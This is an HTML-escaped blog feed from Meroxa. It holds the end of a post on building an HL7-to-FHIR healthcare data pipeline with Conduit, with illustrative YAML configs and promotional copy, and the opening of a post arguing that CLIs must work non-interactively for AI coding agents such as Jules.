&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; hl7&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;fhir&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;processor
  &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; conduit&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;processor&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;hl7
  &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;inputType&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; hl7
    &lt;span class=&quot;token key atrule&quot;&gt;outputType&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; fhir&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h2&gt;&lt;strong&gt;Live Demo: Multi-Destination Healthcare Data Pipeline&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;To demonstrate how Conduit tackles healthcare data challenges, let&apos;s walk through building a complete data pipeline that processes HL7 data in real time. Here’s the architecture of what we’ll be building:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/cd188879b80803483f9d53d444a6fa35/a5c81/mermaid-diagram-2025-06-04-095001.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 101%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAYAAACNiR0NAAAACXBIWXMAAAsTAAALEwEAmpwYAAACA0lEQVR42uWUS2/TQBSF7fqROE6C4zS2kzhJk9iOxy9cHJqiQEQ3bPg77NgjFYQEZcXPQuKxAMGGNX/hcGcSUCsWFW0XSCw+zWhkn7lz7pmR9uoubhLpnxRUdlxLUDE8gVxzIGk9gaz3rijIhdQu/WyjZY/hDmZwBlNY+5O/F+RVcaHqaINqdYKIFaiqQyyXFeIkv0TQ6F9AEaMH1RzAn2awvRDjGcPRakUcI4i4IHkg+CXye+79gUzr9bYP49ZY+MXZqzvQTNqk4Ym5pNNuWmO7oBouas2BEJR1+tCaQbUCgWLN0XAYTDeBYvqQFFugm300yceWPUKtNYDkT0LELEFWlGBpjnkYo93xYfZzsGfvkL/4hPT0A7LnH5Gfvkd+9h29R08QzmIcRBXGU4a8yJBmKaYBgzSaBGBJgvx2ifLwDoJwAavrw5pUyF9+xvLNN5SvvqI6I15/QfH2B5zHTxGHDEGywnxRYLN5gPX9NcKYPKy3hlTqUJSuEdwjkS/yp9YJoNkRdIKPppei1c+gNPmRO+LI3KJ2d3vkensISeLBJOQdYr5rkKzZF1FJoEGNoQJkHmZ1n5roikI4yqU3hSo9D6+cd1sTscnR7UfwRhEWMUNEeH549WDfPX6IcrnBQZCSh2vy8J4I+bWvnkG+ucO5oNkZ39DjoG/h2ZX+jwf2vOBPopnqbmqJCwgAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Meroxa HL7 Pipeline&quot;
        title=&quot;&quot;
        src=&quot;/static/cd188879b80803483f9d53d444a6fa35/5a190/mermaid-diagram-2025-06-04-095001.png&quot;
        srcset=&quot;/static/cd188879b80803483f9d53d444a6fa35/772e8/mermaid-diagram-2025-06-04-095001.png 200w,
/static/cd188879b80803483f9d53d444a6fa35/e17e5/mermaid-diagram-2025-06-04-095001.png 400w,
/static/cd188879b80803483f9d53d444a6fa35/5a190/mermaid-diagram-2025-06-04-095001.png 800w,
/static/cd188879b80803483f9d53d444a6fa35/c1b63/mermaid-diagram-2025-06-04-095001.png 1200w,
/static/cd188879b80803483f9d53d444a6fa35/29007/mermaid-diagram-2025-06-04-095001.png 1600w,
/static/cd188879b80803483f9d53d444a6fa35/a5c81/mermaid-diagram-2025-06-04-095001.png 2333w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;Meroxa SFTP to HL7 Demo Video&lt;/h2&gt;
&lt;iframe width=&quot;560&quot; height=&quot;315&quot; src=&quot;https://www.youtube.com/embed/uRJ67FkdjrU?si=Ybh5i8udHY7paAPp&quot; title=&quot;YouTube video player&quot; frameborder=&quot;0&quot; allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share&quot; referrerpolicy=&quot;strict-origin-when-cross-origin&quot; allowfullscreen&gt;&lt;/iframe&gt;
&lt;p&gt;&lt;a href=&quot;https://www.youtube.com/watch?app=desktop&amp;#x26;v=uRJ67FkdjrU&quot;&gt;https://www.youtube.com/watch?app=desktop&amp;#x26;v=uRJ67FkdjrU&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;1. Setting Up the Data Flow&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;In this example, we&apos;re building a pipeline that:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Monitors an SFTP server for incoming HL7 files&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Processes and converts the data to FHIR format when needed&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Simultaneously delivers the data to multiple destinations:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;PostgreSQL database&lt;/li&gt;
&lt;li&gt;Oracle database&lt;/li&gt;
&lt;li&gt;Databricks&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;2. Creating the Pipeline&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Using Conduit&apos;s platform, we:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Create a new application&lt;/li&gt;
&lt;li&gt;Configure an SFTP source connector with proper credentials&lt;/li&gt;
&lt;li&gt;Add three destinations: PostgreSQL, Oracle, and Databricks&lt;/li&gt;
&lt;li&gt;Attach our custom HL7 processor to handle format conversion&lt;/li&gt;
&lt;li&gt;Add additional processors as needed for specific destination requirements&lt;/li&gt;
&lt;/ol&gt;
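&lt;p&gt;In pipeline-configuration form, the steps above might look roughly like this. The connector plugin and setting names below are illustrative assumptions, not the exact configuration used in the demo, and the Oracle and Databricks destinations are omitted for brevity:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;version: 2.2
pipelines:
  - id: hl7-multi-destination
    status: running
    connectors:
      - id: sftp-source
        type: source
        plugin: sftp                      # illustrative plugin name
        settings:
          address: &quot;sftp.example.com:22&quot;  # example credentials
          username: &quot;hl7user&quot;
          directoryPath: &quot;/incoming/hl7&quot;
      - id: postgres-dest
        type: destination
        plugin: builtin:postgres
        settings:
          url: &quot;postgres://user:pass@localhost:5432/ehr&quot;
          table: &quot;patient_records&quot;
    processors:
      - id: hl7-fhir-processor
        plugin: conduit-processor-hl7
        settings:
          inputType: hl7
          outputType: fhir&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;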
&lt;h3&gt;&lt;strong&gt;3. Results: From Days to Seconds&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;With this pipeline deployed, what previously took up to 5 business days now happens in seconds:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Patient records are detected immediately when uploaded to the SFTP server&lt;/li&gt;
&lt;li&gt;Data is automatically transformed and delivered to all three destinations simultaneously&lt;/li&gt;
&lt;li&gt;Our test patient record &quot;Tremaine Stanton&quot; appears in all systems in real time&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h2&gt;🧠 What Teams Are Building with Meroxa&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Real-Time ADT Notifications&lt;/strong&gt; → routed instantly to care teams&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Live Lab Result Streaming&lt;/strong&gt; → to EHRs, public dashboards, or AI alerts&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Prior Auth Automation&lt;/strong&gt; → kick off workflows the moment orders hit&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Predictive Readmission Alerts&lt;/strong&gt; → powered by real-time FHIR streams&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Multi-Destination Sync&lt;/strong&gt; → from legacy EHRs to modern warehouses&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;It’s not just faster. It’s smarter, more scalable, and easier to maintain.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;📈 The Impact&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Faster care decisions&lt;/strong&gt; → no waiting on faxes or manual exports&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Lower operational cost&lt;/strong&gt; → eliminate duplicate tests and data errors&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Better compliance&lt;/strong&gt; → every message traceable, every pipeline secure&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Future-proof infrastructure&lt;/strong&gt; → bridge legacy HL7 to FHIR and AI, today&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h2&gt;🚀 Ready to Modernize Healthcare Data?&lt;/h2&gt;
&lt;p&gt;Meroxa helps healthcare teams unify fragmented data, power intelligent workflows, and move at the speed of care.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;You don’t have to choose between legacy systems and modern AI.&lt;/p&gt;
&lt;p&gt;With Meroxa, you get both—live and secure.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;👉 &lt;strong&gt;&lt;a href=&quot;https://meroxa.com/contact&quot;&gt;Schedule a demo&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;👉 &lt;strong&gt;&lt;a href=&quot;https://github.com/conduitio-labs/conduit-processor-hl7&quot;&gt;Explore HL7/FHIR pipelines on GitHub&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[AI Coding Agents Are Here and Your CLI Is Not Ready]]></title><description><![CDATA[After having worked on three CLIs (Heroku’s, Meroxa’s and Conduit’s) and advised on some others, I can confidently say this: if your CLI cannot fully operate without human intervention, you are screwed.]]></description><link>https://meroxa.com/blog/ai-coding-agents-are-here-and-your-cli-is-not-ready</link><guid isPermaLink="false">https://meroxa.com/blog/ai-coding-agents-are-here-and-your-cli-is-not-ready</guid><dc:creator><![CDATA[Raúl Barroso]]></dc:creator><pubDate>Mon, 02 Jun 2025 12:12:00 GMT</pubDate><content:encoded>&lt;p&gt;After having worked on three CLIs (&lt;a href=&quot;https://devcenter.heroku.com/articles/heroku-cli&quot;&gt;Heroku’s&lt;/a&gt;, &lt;a href=&quot;https://meroxa.com/blog/how-we-built-our-meroxa-cli/&quot;&gt;Meroxa’s&lt;/a&gt; and &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions/1642&quot;&gt;Conduit’s&lt;/a&gt;) and advised on some others, I can confidently say this: if your CLI cannot fully operate without human intervention, you are screwed.&lt;/p&gt;
&lt;p&gt;One of the main things people tend to forget when building a CLI, called out in the &lt;a href=&quot;https://clig.dev/&quot;&gt;CLI developer guidelines&lt;/a&gt;, is &lt;a href=&quot;https://clig.dev/#interactivity&quot;&gt;Interactivity&lt;/a&gt;. After all, many product-oriented minds want a similar experience in the terminal to the one they would get on a web interface. We want to feel that we are still the drivers of machines with a specific set of options while getting things done in a fun way. Isn&apos;t that something we all want?&lt;/p&gt;
&lt;p&gt;It is time to change the terminal mindset and approach your CLI product differently. Not only does it need to be functional for scripting purposes; it may not even be a human invoking your commands at all.&lt;/p&gt;
&lt;h2&gt;Enter example A. Trying out Jules with SvelteKit.&lt;/h2&gt;
&lt;p&gt;Following a recent announcement from an ex-colleague at Heroku, I wanted to give &lt;a href=&quot;https://jules.google/&quot;&gt;Jules&lt;/a&gt; a try. If you haven’t heard of it, it’s a coding agent announced at the latest Google I/O.&lt;/p&gt;
&lt;p&gt;You connect it to GitHub, you set up a prompt, and Jules does the job for you. That’s the basic idea. The demos I have watched so far focused on iterating over existing running projects, so I wanted to try something from scratch instead. I went ahead, and after connecting Jules solely to a &lt;a href=&quot;https://github.com/raulb/chato&quot;&gt;GitHub repository&lt;/a&gt; I created for this purpose, I gave it this prompt:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Hey Jules, I&apos;d like to build a web application that lets me create an event and find the best time to meet for my friends and I. Something like a Doodle. The event will have a dedicated link that I could use to share with my friends so they can submit their preferences and tell me what&apos;s the right day to meet based on the number of people who can make it. The coding languages I like are Javascript (Typescript), Ruby and Go. My preferred language for this one is Typescript actually. The web app should be mobile friendly since friends will likely use that device. Some frameworks i&apos;m familiar with is Svelte / React. Maybe use Svelte and for styling things like TailwindCSS. I haven&apos;t written a single like of code for this application yet, though I&apos;m fairly familiar with all this. I only want to see how you work on these type of requests. Could you help me with this?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;The tasks that I got back were:&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Initialize project:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Set up a new Svelte project with Typescript
support.&lt;/li&gt;
&lt;li&gt;Integrate TailwindCSS for styling.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Core Data Structures:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Define Typescript interfaces for Event
(name, description, unique link/ID) and
Availability (participant name, selected
time slots).&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Basic Routing:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Set up basic routing for:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Home page (to create new events).&lt;/li&gt;
&lt;li&gt;Event page (to view an event and submit
availability - using a unique event ID in the
URL).&lt;/li&gt;
&lt;li&gt;Results page (to view the best times for an
event - also using the event ID).&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I approved the plan; it sounded like a reasonable starting point. All good so far, right? Well, to my surprise, after a few minutes Jules still couldn’t figure out a clean way to complete even the first step in one go.&lt;/p&gt;
&lt;h3&gt;Here are just some of the things it tried&lt;/h3&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/19aa3c99d57e67a88d5ebae45b33dc41/73dae/cleanshot-2025-05-28-at-5%E2%80%AF.00.23-2x.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 55.00000000000001%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAABH0lEQVR42qWR6Y6DMAyEw5WScJZyhEKhtPv+rzhru7RSb2n3xyeDwZPxRJ0OC5bphJnq6fiDIz0v8xmHYZLePC3UW6Q/9CO6xsG1/RPcn8YjVF01SNOUyJBludQkSRGGIXzfhx8EQsDV86CUesJb+9uyIsFdizAIsdEbaK0RRVqGXw2+4yZYVBeH1iaCMRaJTcUhE8dG4MMMVf7OB34U7LsRvRsxUGZcr0ImtrRyID9fkQiIL4IDnBvQUbBN6yjH4uaEhTW5uzi1kuvXlV27R123aOmWeF1jEnKZISXyvBDHdo3hXbZ3gnzdGQ2yMyaKIkFHG3H3asWPgttyJy88GDxk9ohSr/E8fxUkrSIv7075C0+XwlmVxfZfsMbejfgFYW3x1vC5PMkAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;CleanShot 2025-05-28 at 5 .00.23@2x.png&quot;
        title=&quot;&quot;
        src=&quot;/static/19aa3c99d57e67a88d5ebae45b33dc41/5a190/cleanshot-2025-05-28-at-5%E2%80%AF.00.23-2x.png&quot;
        srcset=&quot;/static/19aa3c99d57e67a88d5ebae45b33dc41/772e8/cleanshot-2025-05-28-at-5%E2%80%AF.00.23-2x.png 200w,
/static/19aa3c99d57e67a88d5ebae45b33dc41/e17e5/cleanshot-2025-05-28-at-5%E2%80%AF.00.23-2x.png 400w,
/static/19aa3c99d57e67a88d5ebae45b33dc41/5a190/cleanshot-2025-05-28-at-5%E2%80%AF.00.23-2x.png 800w,
/static/19aa3c99d57e67a88d5ebae45b33dc41/c1b63/cleanshot-2025-05-28-at-5%E2%80%AF.00.23-2x.png 1200w,
/static/19aa3c99d57e67a88d5ebae45b33dc41/29007/cleanshot-2025-05-28-at-5%E2%80%AF.00.23-2x.png 1600w,
/static/19aa3c99d57e67a88d5ebae45b33dc41/73dae/cleanshot-2025-05-28-at-5%E2%80%AF.00.23-2x.png 2122w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/177fa41a67307fd1b81454f107195b3f/2dc7d/cleanshot-2025-05-28-at-5%E2%80%AF.01.00-2x.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 64.99999999999999%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAABn0lEQVR42p1T2XKDMAzEJCEEGx9gDOQgmf7/P6paYTft9Kl92DGS7fWuJKr79qTH/UX360av7YO2x4vW+UpxTJSmhbHS/A3pF5acX4Sjcs6T0T31xpLtHXkXSHNsOG6aM6m6JqVqqusdqqw5dzgceD1QVVXkbKAqxpnGcRIyrU0m68laR+dzS12nhfxy6eQbuba9SKw7I2KQP51OIqoKfpAEJC/LjYYhChDjoRBGGkKk4/HIKhQrK6gzlCiFQiF01svhdX3Qk2t45fV22yilRero3SDKoQornPTZTccoSlEeIRyHiUCa0iqAvcjKxF77tmz5jJDxNwAyAyDmfNM0si+WEcSYaObu6twg2EbDPO/DOvbwIPIoA/KA4ybCCR7eFYZJ7EzTLDZN7jA2YQWvQx2s43KB5HsvzQNxy83am8IHd5uJTL4M6eg0yFEOEGCcgh+/FCLf53piH6OzE/ImFNp8AEpwWV7mb5REwOdgHaXBt9iGUib5QYgASsqclRH4CxSPE1ZpimYSSeb5+ivZDvWew4lrV367sv4HuIuf4RPjnillSx4eegAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;CleanShot 2025-05-28 at 5 .01.00@2x.png&quot;
        title=&quot;&quot;
        src=&quot;/static/177fa41a67307fd1b81454f107195b3f/5a190/cleanshot-2025-05-28-at-5%E2%80%AF.01.00-2x.png&quot;
        srcset=&quot;/static/177fa41a67307fd1b81454f107195b3f/772e8/cleanshot-2025-05-28-at-5%E2%80%AF.01.00-2x.png 200w,
/static/177fa41a67307fd1b81454f107195b3f/e17e5/cleanshot-2025-05-28-at-5%E2%80%AF.01.00-2x.png 400w,
/static/177fa41a67307fd1b81454f107195b3f/5a190/cleanshot-2025-05-28-at-5%E2%80%AF.01.00-2x.png 800w,
/static/177fa41a67307fd1b81454f107195b3f/c1b63/cleanshot-2025-05-28-at-5%E2%80%AF.01.00-2x.png 1200w,
/static/177fa41a67307fd1b81454f107195b3f/29007/cleanshot-2025-05-28-at-5%E2%80%AF.01.00-2x.png 1600w,
/static/177fa41a67307fd1b81454f107195b3f/2dc7d/cleanshot-2025-05-28-at-5%E2%80%AF.01.00-2x.png 1760w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/acf7f5d4f22fc25eedca8bbed7f18ba4/2d912/cleanshot-2025-05-28-at-5%E2%80%AF.01.29-2x.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 77.5%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB0UlEQVR42pWU6ZaiMBCFI4gsKvsW9oDa8/4vWFO3aGx7prWPP75TgSSXWlFmvNJivrjMtxVzo74dSVctNXV3t68ww0JqmVaR6/wh3JY/92fsTcNMZlzk8NBOD4w0duYbl+lGquUvtw17UDdiOz7Y6O5OXTWCrltKk5yytKA8K4U4SikKEyEMY+qagVTGG1XZyIGyqHmtqSo01SwQRwlhH6RpTkFwJN8LxB6PJ7Isi5RStNvtxJZ5TcpxDuT7AXmev16QtScWBx/BpZ/ZBCtSNXsHtFjNlqnWd/eEoyCfRWmB7le2588zM4oydRONg6Ghn8hMnPxxponpu/HrHTMDc5G8FuwJ0vMvY29IIdTzOZQQT6ez5AZIyNZDyNbKryFvQuE5EiHkEbzO2TNBLgouolqbtW2brS3rrYpvCSIfGfcX+izntet6UnFfqh68L9hyM2rdiSDEkYL93nkj3P8EexZbBUtumSROuYkLiripY14nSSZrgAgingj07lNBHEziTEbHtvfiHS44zmrdgyt2e4/8vvQQHkiVWTBNV2G00eZhFMWSUwgeWNx1Xf6w9bxtKm7IjOc05zAxHfgKNjDT354x3zLnNf8kMpnzR5AK/O7+AgFAdeN+Nnr8AAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;CleanShot 2025-05-28 at 5 .01.29@2x.png&quot;
        title=&quot;&quot;
        src=&quot;/static/acf7f5d4f22fc25eedca8bbed7f18ba4/5a190/cleanshot-2025-05-28-at-5%E2%80%AF.01.29-2x.png&quot;
        srcset=&quot;/static/acf7f5d4f22fc25eedca8bbed7f18ba4/772e8/cleanshot-2025-05-28-at-5%E2%80%AF.01.29-2x.png 200w,
/static/acf7f5d4f22fc25eedca8bbed7f18ba4/e17e5/cleanshot-2025-05-28-at-5%E2%80%AF.01.29-2x.png 400w,
/static/acf7f5d4f22fc25eedca8bbed7f18ba4/5a190/cleanshot-2025-05-28-at-5%E2%80%AF.01.29-2x.png 800w,
/static/acf7f5d4f22fc25eedca8bbed7f18ba4/c1b63/cleanshot-2025-05-28-at-5%E2%80%AF.01.29-2x.png 1200w,
/static/acf7f5d4f22fc25eedca8bbed7f18ba4/29007/cleanshot-2025-05-28-at-5%E2%80%AF.01.29-2x.png 1600w,
/static/acf7f5d4f22fc25eedca8bbed7f18ba4/2d912/cleanshot-2025-05-28-at-5%E2%80%AF.01.29-2x.png 1772w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/309b7bd2712c970f9713240e1577c5e4/61016/cleanshot-2025-05-28-at-5%E2%80%AF.02.00-2x.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 106%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAVCAYAAABG1c6oAAAACXBIWXMAAAsTAAALEwEAmpwYAAACrklEQVR42o2U15biQAxEjQHb4BxxAEyc2f//Qa2ubDNhw5mHOp3VpepqObdhlMvpKqfhLLfLQ8Yz/VH7d7mONxl1DdC/nG/Sd0epikbq8vCB6iCN4jxcxCmLSvb7UBFJ4O8kSVKJokSiMJZYWxBFsYS6Hsfpx5yuh2H06m82WynzUpymbu2GLM2lqhrbsAv2Bvqe58tqtXrBdV3D57nVyhXHcaTI5oBnTXPoRzlqqgT2fN8OseknIOiXgARqmk7aQy9FUUuRV5JqYFLngiTJLK08KyRTBMHu3wHRMNfcadEELTjgK0vfpw1kt9vbmPnvEiwyWEAl4nArDDhES9AFPAYsgyCwQ+v1xvBdjoVhDsOhO6kVTmqFWvr2KDbWFhzRtT9Ldxika4d57SQHlYn0PiNPCznquvMc7/K4vpkHn/d3uV+f1n97/JLH7c3maBkDvEhgvPodt/EhDqLHcWLp4jNEX9pArbPdbmd41qKxu15PcCeste9o2ryD01StPQp6IXqgWmJizM4DYPb9LrQ15nydQ28waRzbPBfxHg75M5Hnhb0S7JKZYaqssQ8wFj/xISkzaFV0DN7qA/T9Sce91Cp+pmLDmHS9mR1SeJ73kmGykjsFrMrG2PCagwpblrV0WgCwi/3VWV/YF6oRe5FoYQ+hfDa7pVzqxkDNC7NBg5IyB/jXy+G6Ppi12FMqAUgwn9sltWVCwPmn1PYbOMT344uZ2FQT1dYqzMwy+aSpVZ14AmMksIDQ5DCBeZzQylI8l7TQDnDBFDidgvK3448SBl4/BW1gaDcvWmk6HCStaVxZiSM1gM4QgExqGpb2HWeGpTEyD85/9r+lyln9YZeXbSiwpLRUGIAVGG82G+vzE35aD/OlHtrzW60rbRJkWW42IfV9GH6pQn8D/mybTn4DNd/lUgJP9ygAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;CleanShot 2025-05-28 at 5 .02.00@2x.png&quot;
        title=&quot;&quot;
        src=&quot;/static/309b7bd2712c970f9713240e1577c5e4/5a190/cleanshot-2025-05-28-at-5%E2%80%AF.02.00-2x.png&quot;
        srcset=&quot;/static/309b7bd2712c970f9713240e1577c5e4/772e8/cleanshot-2025-05-28-at-5%E2%80%AF.02.00-2x.png 200w,
/static/309b7bd2712c970f9713240e1577c5e4/e17e5/cleanshot-2025-05-28-at-5%E2%80%AF.02.00-2x.png 400w,
/static/309b7bd2712c970f9713240e1577c5e4/5a190/cleanshot-2025-05-28-at-5%E2%80%AF.02.00-2x.png 800w,
/static/309b7bd2712c970f9713240e1577c5e4/c1b63/cleanshot-2025-05-28-at-5%E2%80%AF.02.00-2x.png 1200w,
/static/309b7bd2712c970f9713240e1577c5e4/29007/cleanshot-2025-05-28-at-5%E2%80%AF.02.00-2x.png 1600w,
/static/309b7bd2712c970f9713240e1577c5e4/61016/cleanshot-2025-05-28-at-5%E2%80%AF.02.00-2x.png 1770w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
